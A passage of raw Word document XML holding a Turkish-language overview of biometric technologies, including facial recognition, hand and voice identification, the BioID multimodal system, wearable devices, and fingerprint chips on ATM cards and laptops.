          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00175856">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Yüz tanıma (Facial Recognition)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C5321">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yüz tanıma sistemleri, insanların yüzlerini televizyonda veya bir bina veya caddeyi izleyen kapalı devre kameralarda göründüğü gibi otomatik olarak tarayabilir. Yeni bir sistem, yüzün kızılötesi ısı düzenini biyometrik olarak görüyor ve sistemin karanlıkta çalıştığını gösteriyor. Kumarhane endüstrisi, güvenlik görevlileri tarafından hızlı bir şekilde tespit edilebilmesi için yüzlerce aldatmaca sanatçısı veri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C5321">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tabanı oluşturmak için ağ bağlantılı taramaya yatırım yaptı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915023">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bir birey görünüşünü belirgin bir şekilde değiştirdiğinde (örneğin, bir sakal yetiştirerek veya olağandışı bir yüz ifadesi yaparak) sistemin kafası karışabilir. Sistemi karıştırmanın bir başka yolu, bir insanın yüzünün kameralara yönelimini önemli ölçüde değiştirmektir. Sorgu görüntüsü ile veritabanı görüntüsü arasındaki konumdaki 15 derecelik bir fark performansı olumsuz yönde etkileyecektir. Açıkçası, 45 derecelik bir farkla, tanıma etkisiz hale gelir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915023">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>El ve Ses (Hand and Voice)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915023">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>El geometrisi cezaevlerinde kullanılmıştır</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00915023">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Elin üç boyutlu öze</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lliklerini kullanır,</w:t>
      </w:r>
      <w:r w:rsidRPr="00915023">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>parmakların uzunluğu, ge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nişliği, kalınlığı ve dağılımı; </w:t>
      </w:r>
      <w:r w:rsidRPr="00915023">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>damarları; ve diğer özellikler.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00915023">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bir el şişmiş parçaları veya genetik kusurları göstermemelidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="002C4210" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4210">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sesli baskılar Avrupa'da telefon görüşmesi erişimi için </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">yaygın olarak kullanılmaktadır. </w:t>
      </w:r>
      <w:r w:rsidRPr="002C4210">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Özellikle kışın, arayanların ellerini ısıtmak için eldiven giymesi gerektiğinde el izlerinden daha uygundurlar. Gürültülü bir ortamın yanı sıra yaralanma, yaş ve hastalık da ses doğrulamasını olumsuz yönde etkileyebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4210">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Yeni olan nedir?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4210">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>What Is New?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020316D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Biyometrik uygulamalar bugüne kadar kimliğin değiştirilmemesini sağlamak için cezaevi ziyaretçi sistemlerinde ve sahte iddiaları ortadan kaldırmak için fayda ödeme sistemlerinde kullanılmıştır. Biyometrik sistemler, birden fazla lisansı kontrol etmek için kamyon şoförlerinin taşıyabileceği ve devlet sınırlarını veya ulusal sınırları geçtikleri zaman değiştirebilecekleri şekilde kurulmuştur. Yeni sınır kontrol sistemleri, seçilen biyometrik terminallerde ülkeye giren ve çıkan yolcuları izler. Biyometrik tabanlı oylama sistemleri, uygun seçmenlerin kimliğini doğrulamak için kullanılır, böylece bu tür sistemler henüz toplu olarak mevcut olmasa da, vekil oylamanın kötüye kullanılması önleni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Peki, yeni olan ne? Özellikle 1 Ocak 2001'de başlayan üçüncü binyıla geldikten sonra. Neler olduğuna bir göz atmak için, işte kısmi bir liste.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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lastRenderedPageBreak/>
        <w:t>Yüz, ses ve dudak hareketlerinin entegrasyonu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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Giyilebilir biyometrik sistemler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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ATM kartlarında parmak izi cips</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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Kişisel kimlik doğrulama</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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Diğer şey</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Bu biyometrik çabaların bazıları çoktan pazara ulaştı, diğerleri ise hala araştırma aşamasında. Biyometrik entegrasyona ivme kazandıran, biyometrik girişimleriyle Microsoft'tu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p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003E4991"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8"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E4991">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Yüz, Ses ve Dudak Hareketi Entegrasyonu (Integration of Face, Voice, and Lip Movement)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F10420">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Elbette ilk madde, ilginçtir - özellikle dudak okuma hareketinin biyometrisi. Daha ilginç olan, bu modalitenin diğer iki yüz ve sesle bütünleşmesidir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F10420">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F10420">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bu sistemin avantajı, eğer bir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">yöntem </w:t>
      </w:r>
      <w:r w:rsidRPr="00F10420">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">düzgün çalışmıyorsa, diğer iki </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yöntemin</w:t>
      </w:r>
      <w:r w:rsidRPr="00F10420">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> birincinin hatalarını telafi etmesidir. Bunun anlamı, eğer bir modülerlik bozulursa (örneğin, sesi boğan gürültülü bir ortam), diğer iki yöntem hala doğru bir tanımlamaya yol açar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0048711E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048711E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Böyle bir örnek, Dialog Communication Systems AG (Erlangen, Almanya) tarafından geliştirilen Multimodal Biyometrik Kimlik Sistemi BioID'dir. Bu sistem yüz, ses ve dudak hareketi tanıma özelliğini birleştirir. Sistem kayıtları almak ve her bir biyometrik özelliği ayrı ayrı işlemekle başlar. Sistemin eğitimi (kayıt sırasında), her özellik için biyometrik şablonlar oluşturulur. Sistem daha sonra bu şablonları yeni kaydedilenlerle karşılaştırır ve sonuçları tanımak için kullanılanları birleştirir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0048711E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048711E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BioID, dudak görüntülerini, her görüntü bölümünün video dizisindeki bir sonraki bölüme yerel hareketini temsil eden bir vektör alanını hesaplayan bir optik akış tekniği vasıtasıyla toplar. Bu işlem için ön işleme modülü, ağız bölgesini video dizisinin ilk 17 görüntüsünden keser. Dudak hareketlerini, dudakların çerçeveden çerçeveye hareketini temsil eden 16 vektör alanında toplar. Sesi duymadan dudakları okumanın bir dezavantajı, iki veya üç farklı kelime için dudakların aynı şekilde hareket ettiği görünmesidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0048711E">
        <w:t>Şirket, BioID'in, insanların bilgisayar ağları, İnternet ticareti ve bankacılık sistemleri ve ATM gibi teknik bir sisteme erişmesi gereken herhangi bir uygulama için uygun olduğunu iddia ediyor. Uygulamaya bağlı olarak, BioID, kişileri tanımlama veya doğrulama yoluyla yetkilendirir. Kimlik modunda, sistem bir kişiyi tanımlamak için tüm veritabanını aramalıdır. Doğrulama modunda, bir kişi ismini veya bir sayısını verir; sistem daha sonra biyometrik özellikleri kullanarak doğrulamak için doğrudan veritabanının küçük bir bölümüne gider.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048711E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Giyilebilir Biyometri Sistemi (Wearable Biometrics System)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051462F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Günümüzde kameralar ve mikrofonlar çok küçük ve hafiftir ve örneğin yüzleri tanımaya yardımcı olmak için kullanılan giyilebilir sistemlerle başarıyla entegre edilmiştir. Yüz tanıma yazılımından çok daha iyisi, birinin gözlüklerine yerleştirilmiş ses tabanlı bir kameraya sahip olmaktır. Bu cihaz, birinin kulağına fısıldayarak bakmakta olduğu kişinin adını hatırlamasına yardımcı olabilir. ABD Ordusu, bu tür cihazları Bosna'daki sınır muhafızları tarafından kullanılmak üzere test etti. Rochester Üniversitesi Gelecekteki Sağlık Merkezi'ndeki araştırmacılar, Alzheimer hastalığı olan hastalar için bu cihazlara bakıyorlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051462F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Yeni nesil tanıma sistemlerinin insanları gerçek zamanlı olarak ve çok daha az kısıtlı durumlarda tanıması bekleniyor. Gerçek zamanlı olarak çalışan sistemler, </w:t>
      </w:r>
      <w:r w:rsidRPr="0051462F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>üç modalite ile sınırlı olan sistemlerden çok daha dinamiktir. Zaman geldiğinde, sistem bir kişiyi bir biyometrik varlık olarak tanıma yeteneğine sahip olacaktı - bu bireyin sadece bir ya da iki biyometrik parçası değil.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051462F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ATM Kartlarında Parmak İzi Çipi (Fingerprint Chip on ATM Cards)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051462F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Önde gelen bankaların çoğu, kartlar çalındığında ATM’de meydana gelen kimlik sahtekarlığı ile mücadele etmek için biyometrik deneyler yapıyor.</w:t>
      </w:r>
      <w:r w:rsidRPr="0051462F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0051462F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bir örnek, bir ATM üzerine bir parmak izi sensörü yongası yerleştirmektir. Bazı şirketler PKI'ya ATM kartındaki biyometri ile bakıyor. PKI, kullanıcı kimliği ve kimlik doğrulaması için açık anahtarlı şifreleme kullanır; Özel anahtar ATM kartında saklanır ve bir biyometrik ile korunur. PKI matematiksel olarak daha güvenli olsa da, en büyük dezavantajı kullanıcının özel anahtarının gizliliğini korumaktır. Güvende olmak için, özel anahtarın tehlikeye karşı korunması gerekir. Çözüm, özel anahtarı akıllı kartta saklamak ve biyometrik ile korumaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051462F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>18 Ocak 2001'de, Keyware (biyometrik ve merkezi kimlik doğrulama çözümleri sağlayıcısı) Context Systems ile ortaklığa girdi. Sonuncusu, ATM işletim sistemine bindirme olarak biyometrik bir arabirim için ağ güvenliği çözümleri ve PKI etkin uygulamalar sağlayıcısıdır. Bu arayüz, yetkilendirme veya doğrulama uygulaması olarak standart PIN'in yerine geçecektir. Bir banka kartı kartında bir parmak izi ve erişim kartı numarası, banka hesap numarası ve bankacılık kurumlarının kullanabileceği diğer anlamlı bilgiler gibi benzersiz bir kimlik numarası (UIN) bulunur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00855B07">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kişisel Kimlik Doğrulama  (Personal Authentication)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00855B07">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Taşınabilir kimlik doğrulamadaki uygulamalar arasında kişisel bilgi işlem, şifreleme ve otomotiv bulunmaktadır. Birincisi yaygın kullanım kazanıyor, ikincisi ise uygulanabilir olan ilk yerle ilişkilendiriliyor. Üçüncüsü, üreticiler çip üzerindeki olumsuz çevresel etkileri kontrol etmenin daha iyi yollarını buldukları zaman mevcut olacakla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855B07">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Taşınabilir bilgi işlem, kişisel kimlik doğrulamanın ilk yaygın uygulamalarından biridir. Bir şirket ağına erişim sağlayan bir dizüstü bilgisayardaki parmak izi sensörü yongasını içerir. Uygun yazılımla, çip, dizüstü bilgisayar içeriğine beş girişi doğrular: giriş, ekran koruyucu, açılış, dosya şifreleme ve ardından ağ erişimi.</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3B4034">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Veridicom, dizüstü bilgisayar ve diğer taşınabilir bilgisayar kullanıcılarına, parmak izi sensörüyle birleştirilmiş akıllı kart okuyucusu sunar. Verilere, bilgisayar sistemlerine ve dijital sertifikalara erişim için şifreleri değiştirmeyi amaçlamaktadır. Klavyelerde, dizüstü bilgisayarlarda, kablosuz telefonlarda ve Internet cihazlarında yerleşik kimlik doğrulaması için şirketin sensör çipinin daha küçük ve daha verimli bir modeli mevcuttu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3B4034">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dizüstü bilgisayar kullanıcıları için şifreleme, sahibinin parmak izini kullanarak özel bir anahtara erişim sağlamak için özel bir tuş kilidi kutusu olarak gelebilir. Sahip, bu kilit kutusunu özel ağlar ve Internet üzerinden bilgileri şifrelemek için kullanabilir. Bu kilit kutusu ayrıca dijital sertifikalar veya daha güvenli şifreler içermelid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3B4034">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Üreticiler şu anda arabanın kapı kolunda, arabanın kilidini açmak için bir anahtarlıkta veya kontağı açmak için gösterge panelinde bulabilecekleri otomotiv sensör çipleri üzerinde çalışıyor. Bir çipin aşırı hava koşulları altında çalışabilme kabiliyeti ve yolcu kabininde yüksek bir sıcaklık gibi güvenilirlik sorunlarının üstesinden gelmeye çalışıyorlar. Araştırılan diğer bir konu, daha yüksek seviyelerde elektrostatik boşalmaya dayanma yeteneğid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8"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00327F6E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Diğer Yeni Şeyler (</w:t>
      </w:r>
      <w:r w:rsidRPr="00327F6E">
        <w:rPr>
